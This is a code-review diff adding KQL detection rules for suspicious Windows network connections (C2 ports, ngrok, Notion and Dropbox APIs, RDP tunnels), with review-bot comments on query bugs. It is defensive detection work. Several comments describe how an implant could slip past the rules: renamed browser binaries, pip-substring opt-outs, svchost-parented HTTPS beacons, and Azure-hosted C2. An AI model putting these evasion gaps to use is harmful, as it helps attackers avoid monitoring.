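Review bot: The exclusion `not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ... or ipv4_is_in_range(RemoteIP, "fc00::/7")))` never yields a definite false for a public destination: `ipv4_is_in_range` returns null for the three IPv6 prefixes (`"::1/128"`, `"fe80::/10"`, `"fc00::/7"`), `false or null` is null, `not(null)` is null, and `where` drops null rows, so a dialer.exe connection to a public IPv4 address is never reported and IPv6 destinations vanish too. Check the IPv4 and IPv6 prefixes with `ipv4_is_in_range` and `ipv6_is_in_range` respectively and wrap each group in `coalesce(..., false)`, e.g. `| where InitiatingProcessFolderPath endswith ":\\Windows\\System32\\dialer.exe" and not(coalesce(ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16"), false) or coalesce(ipv6_is_in_range(RemoteIP, "::1/128") or ipv6_is_in_range(RemoteIP, "fe80::/10") or ipv6_is_in_range(RemoteIP, "fc00::/7"), false))`; alternatively filter on the table's `RemoteIPType == "Public"`. Since the same `ipv4_is_in_range` pattern is emitted for several rules here, the converter's handling of Sigma `cidr` modifiers is the right place to fix it.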
@@ -0,0 +1,12 @@
+// Title: Outbound Network Connection Initiated By Script Interpreter
+// Author: frack113, Florian Roth (Nextron Systems)
+// Date: 2022-08-28
+// Level: high
+// Description: Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+// - Legitimate scripts
+
+DeviceNetworkEvents
+| where (InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe") and (not(((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or ipv4_is_in_range(RemoteIP, "20.0.0.0/11"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/outbound_network_connection_to_public_ip_via_winlogon.kql b/KQL/rules/windows/network_connection/outbound_network_connection_to_public_ip_via_winlogon.kql
new file mode 100644
index 00000000..f38685ec
--- /dev/null
+++ b/KQL/rules/windows/network_connection/outbound_network_connection_to_public_ip_via_winlogon.kql
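Review bot: The `not(((ipv4_is_in_range(...) or ...) or ipv4_is_in_range(RemoteIP, "20.0.0.0/11")))` filter is evaluated with `ipv4_is_in_range` for the IPv6 prefixes `"::1/128"`, `"fe80::/10"` and `"fc00::/7"`, which returns null rather than false for them; `false or null` stays null, `not(null)` is null, and `where` drops the row, so a wscript/cscript connection to any public IPv4 address outside the listed ranges is silently discarded instead of reported (the extra `20.0.0.0/11` term is valid IPv4 and does not change this). Use `ipv6_is_in_range` for the IPv6 prefixes and coalesce each group, e.g. `... and not(coalesce(ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "20.0.0.0/11"), false) or coalesce(ipv6_is_in_range(RemoteIP, "::1/128") or ipv6_is_in_range(RemoteIP, "fe80::/10") or ipv6_is_in_range(RemoteIP, "fc00::/7"), false))`. Note that the `20.0.0.0/11` exclusion (an Azure block) hides C2 hosted on Azure as well as Microsoft services, so it deserves an explicit comment in the False Positives section rather than being applied silently.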
@@ -0,0 +1,12 @@
+// Title: Outbound Network Connection To Public IP Via Winlogon
+// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io
+// Date: 2023-04-28
+// Level: medium
+// Description: Detects a "winlogon.exe" process that initiate network communications with public IP addresses
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.command-and-control, attack.t1218.011
+// False Positives:
+// - Communication to other corporate systems that use IP addresses from public address spaces
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath endswith "\\winlogon.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/outbound_rdp_connections_over_non_standard_tools.kql b/KQL/rules/windows/network_connection/outbound_rdp_connections_over_non_standard_tools.kql
new file mode 100644
index 00000000..e9ce9edc
--- /dev/null
+++ b/KQL/rules/windows/network_connection/outbound_rdp_connections_over_non_standard_tools.kql
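Review bot: `ipv4_is_in_range(RemoteIP, "::1/128")`, `"fe80::/10"` and `"fc00::/7"` return null for every row (the prefix is not IPv4), and because `false or null` is null, `not(null)` is null and `where` drops null rows, a winlogon.exe connection to a public IPv4 address — the only thing this rule is meant to surface — is never returned; the rule is effectively empty as converted. Use `ipv6_is_in_range` for the IPv6 prefixes and `coalesce(..., false)` around each family, e.g. `| where InitiatingProcessFolderPath endswith "\\winlogon.exe" and not(coalesce(ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16"), false) or coalesce(ipv6_is_in_range(RemoteIP, "::1/128") or ipv6_is_in_range(RemoteIP, "fe80::/10") or ipv6_is_in_range(RemoteIP, "fc00::/7"), false))`, or simply `and RemoteIPType == "Public"`. Without an `ActionType` restriction the query also matches inbound/listen events for winlogon.exe; if the Sigma source carries `Initiated: true` (not visible here), add `and ActionType in ("ConnectionSuccess", "ConnectionRequest", "ConnectionFailed")` to preserve that intent.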
@@ -0,0 +1,13 @@ +// Title: Outbound RDP Connections Over Non-Standard Tools +// Author: Markus Neis +// Date: 2019-05-15 +// Level: high +// Description: Detects Non-Standard tools initiating a connection over port 3389 indicating possible lateral movement. +// An initial baseline is required before using this utility to exclude third party RDP tooling that you might use. +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021.001, car.2013-07-002 +// False Positives: +// - Third party RDP tools + +DeviceNetworkEvents +| where RemotePort == 3389 and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\mstsc.exe", "C:\\Windows\\SysWOW64\\mstsc.exe")))) and (not(((InitiatingProcessFolderPath endswith "\\Avast Software\\Avast\\AvastSvc.exe" or InitiatingProcessFolderPath endswith "\\Avast\\AvastSvc.exe") or InitiatingProcessFolderPath =~ "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\dns.exe" and Protocol =~ "udp" and LocalPort == 53) or InitiatingProcessFolderPath =~ "" or InitiatingProcessFolderPath =~ "C:\\Program Files\\Mozilla Firefox\\firefox.exe" or isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath endswith "\\Ranger\\SentinelRanger.exe" or InitiatingProcessFolderPath startswith "C:\\Program Files\\SplunkUniversalForwarder\\bin\\" or InitiatingProcessFolderPath endswith "\\RDCMan.exe" or (InitiatingProcessFolderPath endswith "\\FSAssessment.exe" or InitiatingProcessFolderPath endswith "\\FSDiscovery.exe" or InitiatingProcessFolderPath endswith "\\MobaRTE.exe" or InitiatingProcessFolderPath endswith "\\mRemote.exe" or InitiatingProcessFolderPath endswith "\\mRemoteNG.exe" or InitiatingProcessFolderPath endswith "\\Passwordstate.exe" or InitiatingProcessFolderPath endswith "\\RemoteDesktopManager.exe" or InitiatingProcessFolderPath endswith "\\RemoteDesktopManager64.exe" or InitiatingProcessFolderPath endswith 
"\\RemoteDesktopManagerFree.exe" or InitiatingProcessFolderPath endswith "\\RSSensor.exe" or InitiatingProcessFolderPath endswith "\\RTS2App.exe" or InitiatingProcessFolderPath endswith "\\RTSApp.exe" or InitiatingProcessFolderPath endswith "\\spiceworks-finder.exe" or InitiatingProcessFolderPath endswith "\\Terminals.exe" or InitiatingProcessFolderPath endswith "\\ws_TunnelService.exe") or (InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe") or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\TSplus\\Java\\bin\\HTML5service.exe", "C:\\Program Files (x86)\\TSplus\\Java\\bin\\HTML5service.exe")) or InitiatingProcessFolderPath =~ ""))) \ No newline at end of file diff --git a/KQL/rules/windows/network_connection/potentially_suspicious_malware_callback_communication.kql b/KQL/rules/windows/network_connection/potentially_suspicious_malware_callback_communication.kql new file mode 100644 index 00000000..fcaa16fc --- /dev/null +++ b/KQL/rules/windows/network_connection/potentially_suspicious_malware_callback_communication.kql 
@@ -0,0 +1,10 @@ +// Title: Potentially Suspicious Malware Callback Communication +// Author: Florian Roth (Nextron Systems) +// Date: 2017-03-19 +// Level: high +// Description: Detects programs that connect to known malware callback ports based on statistical analysis from two different sandbox system databases +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.command-and-control, attack.t1571 + +DeviceNetworkEvents +| where (RemotePort in~ ("100", "198", "200", "243", "473", "666", "700", "743", "777", "1443", "1515", "1777", "1817", "1904", "1960", "2443", "2448", "3360", "3675", "3939", "4040", "4433", "4438", "4443", "4444", "4455", "5445", "5552", "5649", "6625", "7210", "7777", "8143", "8843", "9631", "9943", "10101", "12102", "12103", "12322", "13145", "13394", "13504", "13505", "13506", "13507", "14102", "14103", "14154", "49180", "65520", "65535")) and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\"))) \ No newline at end of file diff --git a/KQL/rules/windows/network_connection/potentially_suspicious_network_connection_to_notion_api.kql b/KQL/rules/windows/network_connection/potentially_suspicious_network_connection_to_notion_api.kql new file mode 100644 index 00000000..e3570b2b --- /dev/null +++ b/KQL/rules/windows/network_connection/potentially_suspicious_network_connection_to_notion_api.kql 
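Review bot: `RemotePort in~ ("100", "198", …)` applies a case-insensitive string operator to the numeric `RemotePort` column; depending on the engine that is a type error or a stringified comparison, and the rest of this batch compares ports numerically (`RemotePort == 3389`). Emit `RemotePort in (100, 198, 200, …, 65535)` instead — the same shape is generated for the other port-list rules, so the converter's handling of numeric `in` lists is the place to fix it. Separately, the private-range exclusion on the same line feeds IPv6 CIDRs to `ipv4_is_in_range`, which returns null and makes the `not(...)` drop every public-IPv4 row; those terms need `ipv6_is_in_range` or a `coalesce(..., false)` wrapper. The trailing exclusion of everything under `C:\\Program Files\\` and `C:\\Program Files (x86)\\` also allow-lists any binary an admin-level attacker drops there, which deserves a line in a false-positives comment.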
@@ -0,0 +1,12 @@ +// Title: Potentially Suspicious Network Connection To Notion API +// Author: Gavin Knapp +// Date: 2023-05-03 +// Level: low +// Description: Detects a non-browser process communicating with the Notion API. This could indicate potential use of a covert C2 channel such as "OffensiveNotion C2" +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1102 +// False Positives: +// - Legitimate applications communicating with the "api.notion.com" endpoint that are not already in the exclusion list. The desktop and browser applications do not appear to be using the API by default unless integrations are configured. + +DeviceNetworkEvents +| where RemoteUrl contains "api.notion.com" and (not((InitiatingProcessFolderPath endswith "\\brave.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath 
endswith "\\AppData\\Local\\Programs\\Notion\\Notion.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe"))) \ No newline at end of file diff --git a/KQL/rules/windows/network_connection/potentially_suspicious_wuauclt_network_connection.kql b/KQL/rules/windows/network_connection/potentially_suspicious_wuauclt_network_connection.kql new file mode 100644 index 00000000..fccf216e --- /dev/null +++ b/KQL/rules/windows/network_connection/potentially_suspicious_wuauclt_network_connection.kql 
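Review bot: Most of the browser exclusions on the `| where` line match on bare file name (`\\brave.exe`, `\\opera.exe`, `\\vivaldi.exe`, `\\safari.exe`, `\\whale.exe`, …), so an implant renamed to one of those and run from any directory is allow-listed while talking to `api.notion.com`; only Chrome, Edge, Firefox, IE and Notion itself are anchored to an install path. Consider anchoring the remaining names under `:\\Program Files` / `\\AppData\\Local\\Programs\\` the way the `\\AppData\\Local\\Programs\\Notion\\Notion.exe` entry is, or pairing each name with a publisher check such as `InitiatingProcessVersionInfoCompanyName` if that column is available on this table, and state the residual rename bypass in the false-positives comment.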
@@ -0,0 +1,11 @@ +// Title: Potentially Suspicious Wuauclt Network Connection +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-10-12 +// Level: medium +// Description: Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making network connections. +// One could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceNetworkEvents +| where (InitiatingProcessCommandLine contains " /RunHandlerComServer" and InitiatingProcessFolderPath contains "wuauclt") and (not((InitiatingProcessCommandLine =~ "" or isnull(InitiatingProcessCommandLine) or (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or (ipv4_is_in_range(RemoteIP, "20.184.0.0/13") or ipv4_is_in_range(RemoteIP, "20.192.0.0/10") or ipv4_is_in_range(RemoteIP, "23.79.0.0/16") or ipv4_is_in_range(RemoteIP, "51.10.0.0/15") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/15") or ipv4_is_in_range(RemoteIP, "52.224.0.0/11")) or (InitiatingProcessCommandLine contains ":\\Windows\\UUS\\Packages\\Preview\\amd64\\updatedeploy.dll /ClassId" or InitiatingProcessCommandLine contains ":\\Windows\\UUS\\amd64\\UpdateDeploy.dll /ClassId") or (InitiatingProcessCommandLine contains ":\\Windows\\WinSxS\\" and InitiatingProcessCommandLine contains "\\UpdateDeploy.dll /ClassId ")))) \ No newline at end of file 
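Review bot: The `InitiatingProcessCommandLine =~ "" or isnull(InitiatingProcessCommandLine)` exclusion inside the `not(...)` is dead code, because the selection on the same line already requires the command line to contain ` /RunHandlerComServer`; it can be dropped. More importantly, the private-range terms `ipv4_is_in_range(RemoteIP, "::1/128")`, `"fe80::/10"` and `"fc00::/7"` return null, which propagates through the `or` chain and the `not()`, so `where` drops every public-IPv4 event and the rule never fires until those become `ipv6_is_in_range(RemoteIP, ...)` or the check is wrapped in `coalesce(..., false)`. The `20.184.0.0/13`, `20.192.0.0/10` and `52.224.0.0/11` exclusions are general Azure address space that attacker infrastructure can also sit in, so a false-positives comment should say the rule trades that coverage for noise reduction.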
diff --git a/KQL/rules/windows/network_connection/process_initiated_network_connection_to_ngrok_domain.kql b/KQL/rules/windows/network_connection/process_initiated_network_connection_to_ngrok_domain.kql new file mode 100644 index 00000000..e9168354 --- /dev/null +++ b/KQL/rules/windows/network_connection/process_initiated_network_connection_to_ngrok_domain.kql @@ -0,0 +1,14 @@ +// Title: Process Initiated Network Connection To Ngrok Domain +// Author: Florian Roth (Nextron Systems) +// Date: 2022-07-16 +// Level: high +// Description: Detects an executable initiating a network connection to "ngrok" domains. +// Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. +// While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572, attack.t1102 +// False Positives: +// - Legitimate use of the ngrok service. + +DeviceNetworkEvents +| where RemoteUrl endswith ".ngrok-free.app" or RemoteUrl endswith ".ngrok-free.dev" or RemoteUrl endswith ".ngrok.app" or RemoteUrl endswith ".ngrok.dev" or RemoteUrl endswith ".ngrok.io" \ No newline at end of file diff --git a/KQL/rules/windows/network_connection/python_initiated_connection.kql b/KQL/rules/windows/network_connection/python_initiated_connection.kql new file mode 100644 index 00000000..bb3abc56 --- /dev/null +++ b/KQL/rules/windows/network_connection/python_initiated_connection.kql 
@@ -0,0 +1,12 @@ +// Title: Python Initiated Connection +// Author: frack113 +// Date: 2021-12-10 +// Level: medium +// Description: Detects a Python process initiating a network connection. While this often relates to package installation, it can also indicate a potential malicious script communicating with a C&C server. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1046 +// False Positives: +// - Legitimate python scripts using the socket library or similar will trigger this. Apply additional filters and perform an initial baseline before deploying. + +DeviceNetworkEvents +| where (InitiatingProcessFolderPath contains "\\python" and InitiatingProcessFolderPath contains ".exe") and (not(((RemoteIP =~ "127.0.0.1" and LocalIP =~ "127.0.0.1") or (InitiatingProcessCommandLine contains "pip.exe" and InitiatingProcessCommandLine contains "install")))) and (not((((InitiatingProcessCommandLine contains ":\\ProgramData\\Anaconda3\\Scripts\\conda-script.py" and InitiatingProcessCommandLine contains "update") and InitiatingProcessParentFileName =~ "conda.exe") or (InitiatingProcessCommandLine contains "C:\\ProgramData\\Anaconda3\\Scripts\\jupyter-notebook-script.py" and InitiatingProcessParentFileName =~ "python.exe")))) \ No newline at end of file diff --git a/KQL/rules/windows/network_connection/rdp_over_reverse_ssh_tunnel.kql b/KQL/rules/windows/network_connection/rdp_over_reverse_ssh_tunnel.kql new file mode 100644 index 00000000..2b3e030b --- /dev/null +++ b/KQL/rules/windows/network_connection/rdp_over_reverse_ssh_tunnel.kql 
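Review bot: The `InitiatingProcessCommandLine contains "pip.exe" and InitiatingProcessCommandLine contains "install"` exclusion on the `| where` line keys on attacker-controlled text: any python.exe invocation whose command line merely mentions both substrings (a script argument, a `-c` payload, a comment) is allow-listed, so a beacon can opt out of the rule. Tighten it to the real pip invocation, e.g. `InitiatingProcessCommandLine has_any ("pip.exe install", "-m pip install")` or a check on `InitiatingProcessParentFileName`, and record the limitation in the false-positives comment. `InitiatingProcessFolderPath contains "\\python" and InitiatingProcessFolderPath contains ".exe"` also matches any executable under a folder whose name starts with `python`; if versioned interpreters are the reason for `contains`, `InitiatingProcessFileName startswith "python"` is a tighter way to express that.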
@@ -0,0 +1,10 @@ +// Title: RDP Over Reverse SSH Tunnel +// Author: Samir Bousseaden +// Date: 2019-02-16 +// Level: high +// Description: Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389 +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1572, attack.lateral-movement, attack.t1021.001, car.2013-07-002 + +DeviceNetworkEvents +| where (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "::1/128")) and (InitiatingProcessFolderPath endswith "\\svchost.exe" and LocalPort == 3389) \ No newline at end of file diff --git a/KQL/rules/windows/network_connection/rdp_to_http_or_https_target_ports.kql b/KQL/rules/windows/network_connection/rdp_to_http_or_https_target_ports.kql new file mode 100644 index 00000000..a71eedb4 --- /dev/null +++ b/KQL/rules/windows/network_connection/rdp_to_http_or_https_target_ports.kql @@ -0,0 +1,10 @@ +// Title: RDP to HTTP or HTTPS Target Ports +// Author: Florian Roth (Nextron Systems) +// Date: 2022-04-29 +// Level: high +// Description: Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443 +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1572, attack.lateral-movement, attack.t1021.001, car.2013-07-002 + +DeviceNetworkEvents +| where (RemotePort in~ ("80", "443")) and InitiatingProcessFolderPath endswith "\\svchost.exe" and LocalPort == 3389 \ No newline at end of file diff --git a/KQL/rules/windows/network_connection/regasm_exe_initiating_network_connection_to_public_ip.kql b/KQL/rules/windows/network_connection/regasm_exe_initiating_network_connection_to_public_ip.kql new file mode 100644 index 00000000..bb0df4e6 --- /dev/null +++ b/KQL/rules/windows/network_connection/regasm_exe_initiating_network_connection_to_public_ip.kql 
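Review bot: `ipv4_is_in_range(RemoteIP, "::1/128")` on the `| where` line returns null because the range is not IPv4, so the IPv6 loopback case never matches (null `or` false is null and the row is dropped); only the `127.0.0.0/8` term actually works. Use `ipv6_is_in_range(RemoteIP, "::1/128")` for that term so a tunnel bound to `[::1]:3389` is caught as well. Since `DeviceNetworkEvents` records both directions and the Sysmon `Initiated` semantics of the original are not carried over, a comment stating whether `InboundConnectionAccepted` on 3389 is the intended match would help whoever tunes this.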
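Review bot: `RemotePort in~ ("80", "443")` applies a case-insensitive string operator to the numeric `RemotePort` column, which is either a type error or a stringified comparison depending on the engine, while `LocalPort == 3389` on the same line compares numerically. Use `RemotePort in (80, 443)` here; the same shape is emitted for the other port lists in this batch (SMTP, wordpad, msbuild, malware-callback), so the converter's numeric `in` handling is where the fix belongs.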
@@ -0,0 +1,10 @@ +// Title: RegAsm.EXE Initiating Network Connection To Public IP +// Author: frack113 +// Date: 2024-04-25 +// Level: medium +// Description: Detects "RegAsm.exe" initiating a network connection to public IP adresses +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.009 + +DeviceNetworkEvents +| where InitiatingProcessFolderPath endswith "\\regasm.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) \ No newline at end of file diff --git a/KQL/rules/windows/network_connection/remote_access_tool_anydesk_incoming_connection.kql b/KQL/rules/windows/network_connection/remote_access_tool_anydesk_incoming_connection.kql new file mode 100644 index 00000000..a330e552 --- /dev/null +++ b/KQL/rules/windows/network_connection/remote_access_tool_anydesk_incoming_connection.kql @@ -0,0 +1,12 @@ +// Title: Remote Access Tool - AnyDesk Incoming Connection +// Author: @d4ns4n_ (Wuerth-Phoenix) +// Date: 2024-09-02 +// Level: medium +// Description: Detects incoming connections to AnyDesk. This could indicate a potential remote attacker trying to connect to a listening instance of AnyDesk and use it as potential command and control channel. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate incoming connections (e.g. sysadmin activity). Most of the time I would expect outgoing connections (initiated locally). + +DeviceNetworkEvents +| where InitiatingProcessFolderPath endswith "\\AnyDesk.exe" or InitiatingProcessFolderPath endswith "\\AnyDeskMSI.exe" \ No newline at end of file 
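Review bot: The private-range filter on the `| where` line hands the IPv6 CIDRs `::1/128`, `fe80::/10` and `fc00::/7` to `ipv4_is_in_range`, which returns null for them; the null propagates through the `or` chain and the `not()`, and `where` discards the row, so regasm.exe connections to public IPv4 addresses — the thing the rule exists for — never surface. Switch those three terms to `ipv6_is_in_range(RemoteIP, ...)` or wrap the whole check in `coalesce(..., false)`.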
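Review bot: The title and description say this detects incoming connections, but the `| where` clause only matches on the process name, so every AnyDesk network event — outbound relay traffic, update checks, normal client keepalives — will alert, and at medium severity that is noise rather than the C2 signal described. If inbound is the intent, add the direction the original expressed with Sysmon's `Initiated` field, e.g. `and ActionType == "InboundConnectionAccepted"`, and say in a false-positives line that direct (non-relay) sessions are what this is meant to surface.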
diff --git a/KQL/rules/windows/network_connection/rundll32_internet_connection.kql b/KQL/rules/windows/network_connection/rundll32_internet_connection.kql new file mode 100644 index 00000000..ba46f5e8 --- /dev/null +++ b/KQL/rules/windows/network_connection/rundll32_internet_connection.kql @@ -0,0 +1,12 @@ +// Title: Rundll32 Internet Connection +// Author: Florian Roth (Nextron Systems) +// Date: 2017-11-04 +// Level: medium +// Description: Detects a rundll32 that communicates with public IP addresses +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011, attack.execution +// False Positives: +// - Communication to other corporate systems that use IP addresses from public address spaces + +DeviceNetworkEvents +| where InitiatingProcessFolderPath endswith "\\rundll32.exe" and (not((InitiatingProcessCommandLine endswith "\\system32\\PcaSvc.dll,PcaPatchSdbTask" or DeviceName endswith ".internal.cloudapp.net" or (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or (ipv4_is_in_range(RemoteIP, "20.0.0.0/8") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/16") or ipv4_is_in_range(RemoteIP, "51.105.0.0/16")) or (RemotePort == 443 and InitiatingProcessParentFileName =~ "svchost.exe")))) \ No newline at end of file diff --git a/KQL/rules/windows/network_connection/silenttrinity_stager_msbuild_activity.kql b/KQL/rules/windows/network_connection/silenttrinity_stager_msbuild_activity.kql new file mode 100644 index 00000000..60bd1a55 --- /dev/null +++ b/KQL/rules/windows/network_connection/silenttrinity_stager_msbuild_activity.kql 
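Review bot: The `ipv4_is_in_range` terms for `::1/128`, `fe80::/10` and `fc00::/7` on the `| where` line return null and make the whole `not(...)` null, so rundll32 connections to public IPv4 addresses are dropped by `where` and the rule never fires; those three need `ipv6_is_in_range(RemoteIP, ...)` or a `coalesce(..., false)` wrapper. The `RemotePort == 443 and InitiatingProcessParentFileName =~ "svchost.exe"` exclusion also removes exactly the shape a scheduled-task- or service-launched rundll32 beacon takes (svchost parent, HTTPS), and `ipv4_is_in_range(RemoteIP, "20.0.0.0/8")` allow-lists a /8 of Azure space that hosts arbitrary tenants; both deserve a sentence in the false-positives comment so analysts know what coverage is being traded away.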
@@ -0,0 +1,10 @@ +// Title: Silenttrinity Stager Msbuild Activity +// Author: Kiran kumar s, oscd.community +// Date: 2020-10-11 +// Level: high +// Description: Detects a possible remote connections to Silenttrinity c2 +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1127.001 + +DeviceNetworkEvents +| where InitiatingProcessFolderPath endswith "\\msbuild.exe" and (RemotePort in~ ("80", "443")) \ No newline at end of file diff --git a/KQL/rules/windows/network_connection/suspicious_dropbox_api_usage.kql b/KQL/rules/windows/network_connection/suspicious_dropbox_api_usage.kql new file mode 100644 index 00000000..06615ead --- /dev/null +++ b/KQL/rules/windows/network_connection/suspicious_dropbox_api_usage.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Dropbox API Usage +// Author: Florian Roth (Nextron Systems) +// Date: 2022-04-20 +// Level: high +// Description: Detects an executable that isn't dropbox but communicates with the Dropbox API +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.exfiltration, attack.t1105, attack.t1567.002 +// False Positives: +// - Legitimate use of the API with a tool that the author wasn't aware of + +DeviceNetworkEvents +| where (RemoteUrl endswith "api.dropboxapi.com" or RemoteUrl endswith "content.dropboxapi.com") and (not(InitiatingProcessFolderPath 